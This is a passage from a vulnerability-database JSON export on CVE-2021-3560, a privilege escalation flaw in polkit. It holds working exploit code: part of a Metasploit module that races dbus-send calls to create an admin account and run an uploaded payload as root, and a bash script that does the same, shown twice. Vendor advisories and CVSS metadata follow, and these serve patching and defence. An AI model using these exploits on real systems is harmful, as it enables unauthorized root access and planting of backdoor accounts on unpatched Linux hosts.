affected.') \nend \n# Ubuntu 19.04 and older are *not* affected \n \nif current_version < Rex::Version.new(patched_version_string.gsub(/ubuntu/, '.')) \nreturn CheckCode::Appears(\"Version #{current_version_string} is affected.\") \nend \n \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected.\") \nend \nend \nend \n \ndef cmd_exec(*args) \nresult = super \nresult.gsub(/(\\e\\(B)?\\e\\[([;\\d]+)?m/, '') # remove ANSI escape sequences from the command output \nend \n \ndef dbus_method_call(object_path, interface_member, *args) \ncmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply] \ncmd_args << object_path \ncmd_args << interface_member \nargs.each do |arg| \nif arg.is_a?(Integer) \ncmd_args << \"int32:#{arg}\" \nelsif arg.is_a?(String) \ncmd_args << \"string:'#{arg}'\" \nend \nend \n \ncmd = cmd_args.join(' ') \nvprint_status(\"Running: #{cmd}\") \ncmd_exec(cmd) \nend \n \ndef create_unix_crypt_hash \nUnixCrypt::SHA256.build(datastore['PASSWORD'].to_s) \nend \n \ndef exploit_set_username(loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts \norg.freedesktop.Accounts.CreateUser \nstring:#{datastore['USERNAME']} \nstring:\\\"#{datastore['USERNAME']}\\\" \nint32:1 & \nsleep #{@cmd_delay}s; \nkill $!; \nif id #{datastore['USERNAME']}; then \necho \\\"success\\\"; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef exploit_set_password(uid, hashed_password, loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts/User#{uid} \norg.freedesktop.Accounts.User.SetPassword \nstring:'#{hashed_password}' \nstring: & \nsleep #{@cmd_delay}s; \nkill $!; \necho #{datastore['PASSWORD']} \n| su - #{datastore['USERNAME']} \n-c \\\"echo #{datastore['PASSWORD']} | sudo -S id\\\" \n| grep \\\"uid=0(root)\\\"; \nif [ $? -eq 0 ]; then \necho \\\"success\\\"; \nbreak; \nfi; \ndone; \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef exploit_delete_user(uid, loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts \norg.freedesktop.Accounts.DeleteUser \nint64:#{uid} \nboolean:true & \nsleep #{@cmd_delay}s; \nkill $!; \nif id #{datastore['USERNAME']}; then \necho \\\"failed\\\"; \nelse \necho \\\"success\\\"; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef upload(path, data) \nprint_status(\"Writing '#{path}' (#{data.size} bytes) ...\") \nrm_f(path) \nwrite_file(path, data) \nregister_file_for_cleanup(path) \nend \n \ndef upload_and_chmodx(path, data) \nupload(path, data) \nchmod(path) \nend \n \ndef upload_payload \nfname = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}\" \nupload_and_chmodx(fname, generate_payload_exe) \nreturn nil unless file_exist?(fname) \n \nfname \nend \n \ndef execute_payload(fname) \ncmd_exec(\"echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \\\"echo #{datastore['PASSWORD']} | sudo -S #{fname}\\\"\") \nend \n \ndef exploit \nfail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su') \nfail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send') \nif datastore['TIMEOUT'] < 26 \nfail_with(Failure::BadConfig, \"TIMEOUT is set to less than 26 seconds, so we can't detect if dbus-send times out or not.\") \nend \n \nif @cmd_delay.nil? \n# cmd_delay wasn't set yet which is needed for the rest of the exploit to operate, \n# likely cause the check method wasn't executed. Lets set it so long. \n \n# Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit \n@cmd_delay = get_cmd_delay \nfail_with(Failure::Unknown, 'Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil? \nend \n \nprint_status(\"Attempting to create user #{datastore['USERNAME']}\") \nloop_sequence = get_loop_sequence \n \nfail_with(Failure::BadConfig, \"The user #{datastore['USERNAME']} was unable to be created. Try increasing the ITERATIONS amount.\") unless exploit_set_username(loop_sequence) \nuid = cmd_exec(\"id -u #{datastore['USERNAME']}\") \nprint_good(\"User #{datastore['USERNAME']} created with UID #{uid}\") \nprint_status(\"Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}\") \nif exploit_set_password(uid, create_unix_crypt_hash, loop_sequence) \nprint_good('Obtained code execution as root!') \nfname = upload_payload \nexecute_payload(fname) \nelse \nprint_error(\"Attempted to set the password #{datastore['Iterations']} times, did not work.\") \nend \n \nprint_status('Attempting to remove the user added: ') \nif exploit_delete_user(uid, loop_sequence) \nprint_good(\"Successfully removed #{datastore['USERNAME']}\") \nelse \nprint_warning(\"Unable to remove user: #{datastore['USERNAME']}, created during the running of this module\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163452/polkit_dbus_auth_bypass.rb.txt"}, {"lastseen": "2021-06-15T15:56:14", "description": "", "cvss3": {}, "published": "2021-06-15T00:00:00", "type": "packetstorm", "title": "Polkit 0.105-26 0.117-2 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "PACKETSTORM:163142", "href": "https://packetstormsecurity.com/files/163142/Polkit-0.105-26-0.117-2-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation \n# Date: 06/11/2021 \n# Exploit Author: J Smith (CadmusofThebes) \n# Vendor Homepage: https://www.freedesktop.org/ \n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html \n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora) \n# Tested on: Ubuntu 20.04, Fedora 33 \n# CVE: CVE-2021-3560 \n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ \n \n#!/bin/bash \n \n# Set the name and display name \nuserName=\"hacked\" \nrealName=\"hacked\" \n \n# Set the account as an administrator \naccountType=1 \n \n# Set the password hash for 'password' and password hint \npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB' \npassHint=\"password\" \n \n# Check Polkit version \npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9) \nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then \necho \"[*] Vulnerable version of polkit found\" \nelse \necho \"[!] WARNING: Version of polkit might not vulnerable\" \nfi \n \n# Validate user is running in SSH instead of desktop terminal \nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then \necho \"[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\" \nexit \nfi \n \n# Test the dbus-send timing to load into exploit \necho \"[*] Determining dbus-send timing\" \nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 ) \nhalfTime=$(echo \"scale=3;$realTime/2\" | bc) \n \n# Check for user first in case previous run of script failed on password set \nif id \"$userName\" &>/dev/null; then \nuserid=$(id -u $userName) \necho \"[*] New user $userName already exists with uid of $userid\" \nelse \nuserid=\"\" \necho \"[*] Attempting to create account\" \nwhile [[ $userid == \"\" ]] \ndo \ndbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null \nif id \"$userName\" &>/dev/null; then \nuserid=$(id -u $userName) \necho \"[*] New user $userName created with uid of $userid\" \nfi \ndone \nfi \n \n# Add the password to /etc/shadow \necho \"[*] Adding password to /etc/shadow\" \nx=0 \nwhile [ $x -lt 100 ] \ndo \ndbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null \nx=$(($x + 1)) \ndone \n \necho \"[*] Exploit complete! If the password does not work, run the exploit again\" \necho \"\" \necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163142/polkit010526-escalate.txt"}], "cve": [{"lastseen": "2023-06-19T14:51:38", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "cve", "title": "CVE-2021-3560", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "cpe": ["cpe:/o:debian:debian_linux:11.0", "cpe:/a:redhat:openshift_container_platform:4.7", "cpe:/a:redhat:virtualization_host:4.0", "cpe:/a:redhat:virtualization:4.0", "cpe:/o:canonical:ubuntu_linux:20.04"], "id": "CVE-2021-3560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:*:*:*:*"]}], "redos": [{"lastseen": "2023-09-08T15:46:54", "description": "A vulnerability in the polkit_system_bus_name_get_creds_sync() function of the dbus-daemon of the Polkit library is related to\r\n with access control flaws. Exploitation of the vulnerability could allow an attacker to escalate their\r\n privileges", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T00:00:00", "type": "redos", "title": "ROS-20211223-06", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-12-23T00:00:00", "id": "ROS-20211223-06", "href": "https://redos.red-soft.ru/support/secure/uyazvimosti/uyazvimost-polkit-cve-2021-3560/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2023-06-19T15:01:16", "description": "Arch Linux Security Advisory ASA-202106-24\n==========================================\n\nSeverity: Medium\nDate : 2021-06-09\nCVE-ID : CVE-2021-3560\nPackage : polkit\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-2028\n\nSummary\n=======\n\nThe package polkit before version 0.119-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 0.119-1.\n\n# pacman -Syu \"polkit>=0.119-1\"\n\nThe problem has been fixed upstream in version 0.119.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in polkit before version 0.119. When a\nrequesting process disconnects from dbus-daemon just before the call to\npolkit_system_bus_name_get_creds_sync starts, the process cannot get a\nunique uid and pid of the process and it cannot verify the privileges\nof the requesting process.\n\nImpact\n======\n\nA local attacker could escalate privileges by exploiting a race\ncondition.\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/06/03/1\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1961710\nhttps://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\nhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81\nhttps://security.archlinux.org/CVE-2021-3560", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-09T00:00:00", "type": "archlinux", "title": "[ASA-202106-24] polkit: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-09T00:00:00", "id": "ASA-202106-24", "href": "https://security.archlinux.org/ASA-202106-24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-07-11T11:16:42", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n\n \n**Recent assessments:** \n \n**jheysel-r7** at October 05, 2022 7:28pm UTC reported:\n\nPolkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. D-Bus is a message-oriented middleware mechanism that allows communication between multiple processes running concurrently on the same machine.\n\nA vulnerbility was found in Polkit that allows a local unprivileged attacker to obtain execution as the root user. The attacker needs to invoke method over D-bus and then kill the client process. Not always, but sometimes this will cause the operation to complete without requiring authenetication.\n\nThis allows a local unprivilged attacker to attempt to create a new user with sudo access and a known password. When successful, the attacker can then execute a payload with root privileges.\n\nThis is bad. Polkit is installed by default across many linux distributions making this a fantastic attack vector. Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-16T00:00:00", "id": "AKB:10791C9D-4C05-4C36-8F8D-BAA2EE6DC9B7", "href": "https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T13:49:05", "description": "policykit-1 is vulnerable to denial of service. The vulnerability exists due to the system unable to get a unique uid and pid of the process and it cannot verify the privileges of the requesting process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T22:46:32", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-07-11T20:46:39", "id": "VERACODE:30804", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30804/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rocky": [{"lastseen": "2023-07-24T17:27:08", "description": "An update is available for polkit.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nThe polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "rocky", "title": "polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T07:54:47", "id": "RLSA-2021:2238", "href": "https://errata.rockylinux.org/RLSA-2021:2238", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T06:12:44", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "prion", "title": "CVE-2021-3560", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2021-3560", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-29T13:53:32", "description": "It was found that polkit could be tricked into bypassing the credential\nchecks for D-Bus requests, elevating the privileges of the requestor to the\nroot user. This flaw could be used by an unprivileged local attacker to,\nfor example, create a new local administrator. The highest threat from this\nvulnerability is to data confidentiality and integrity as well as system\navailability.\n\n#### Bugs\n\n * <https://gitlab.freedesktop.org/polkit/polkit/-/issues/140>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1961710>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | commit introducing issue was backported to policykit-1 version in Ubuntu in focal+\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "UB:CVE-2021-3560", "href": "https://ubuntu.com/security/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2022-02-28T18:13:09", "description": "[0.115-11.0.1]\n- Increase timeout to avoid defunct processes [Orabug: 26930744]\n[0.115-11.1]\n- early disconnection from D-Bus results in privilege esc.\n- Resolves: CVE-2021-3560", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "oraclelinux", "title": "polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "ELSA-2021-2238", "href": "http://linux.oracle.com/errata/ELSA-2021-2238.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-26T12:52:23", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "exploitdb", "title": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-3560", "CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "EDB-ID:50011", "href": "https://www.exploit-db.com/exploits/50011", "sourceData": "# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation\r\n# Date: 06/11/2021\r\n# Exploit Author: J Smith (CadmusofThebes)\r\n# Vendor Homepage: https://www.freedesktop.org/\r\n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html\r\n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)\r\n# Tested on: Ubuntu 20.04, Fedora 33\r\n# CVE: CVE-2021-3560\r\n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\r\n\r\n#!/bin/bash\r\n\r\n# Set the name and display name\r\nuserName=\"hacked\"\r\nrealName=\"hacked\"\r\n\r\n# Set the account as an administrator\r\naccountType=1 \r\n\r\n# Set the password hash for 'password' and password hint\r\npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'\r\npassHint=\"password\"\r\n\r\n# Check Polkit version\r\npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9)\r\nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then\r\n echo \"[*] Vulnerable version of polkit found\"\r\nelse\r\n echo \"[!] WARNING: Version of polkit might not vulnerable\"\r\nfi\r\n\r\n# Validate user is running in SSH instead of 